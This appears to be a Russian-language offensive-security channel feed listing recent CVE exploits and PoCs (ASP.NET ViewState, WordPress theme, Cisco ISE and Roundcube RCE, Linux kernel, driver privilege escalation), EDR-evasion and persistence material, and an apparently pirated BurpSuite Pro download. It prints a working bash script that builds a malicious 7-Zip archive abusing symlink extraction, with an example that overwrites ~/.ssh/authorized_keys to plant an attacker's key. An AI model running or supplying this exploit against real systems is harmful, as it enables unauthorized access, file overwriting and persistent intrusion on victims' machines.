eBPF против EDR
*
RingReaper
Ты $USERNAME главное чекай версию ядра

CVE-2025-30406
*
ViewState deserialization in ASP.NET applications

*
POC

CVE-2025-5394
*
Wordpress Alone theme ≤ 7.8.3
*
exploit

#wordpress

BurpSuite PRO + extentions + Bounty Pro

version: 2025.6.1
download

#burpPro

😄

#old #HL #CS

Linux-persistence
*
zero pepsi

ждем сок добрый сплоит пак и наступательный чебурек

Анализ ampa.sys Driver
*
writeUP + POC

#LPE

CVE-2025-20281
*
Cisco ISE - Remote Code Execution
*

#cisco

Ну не только же WinRAR сцену занимать, да ?
*
7zip

CVE-2025-38236 - Linux Kernel Flaw
*
POC

CVE-2025-55188
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.

#!/bin/bash
if [ "$#" -ne 3 ]; then
    echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
    echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
    exit 1
fi

PAYLOAD="$1"
TARGET="$2"
OUT="$3"

WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"

tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null

echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"

DEF CON 33
*
Начинают подъезжать доклады с дефон33
*
Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G & 4G LTE Routers

#defcon

Душевно было
раздел - приколы, открывать\закрывать сидишник 😁

Link

CVE-2025-49113 - Roundcube mail server RCE
*
POC

Когда обновил все docker containers, а там все тот же XZ Utils backdoor


#include

DEF CON 33

Продолжаем публикацию материалов с дефкона
*
Killing and Silencing EDR

#defcon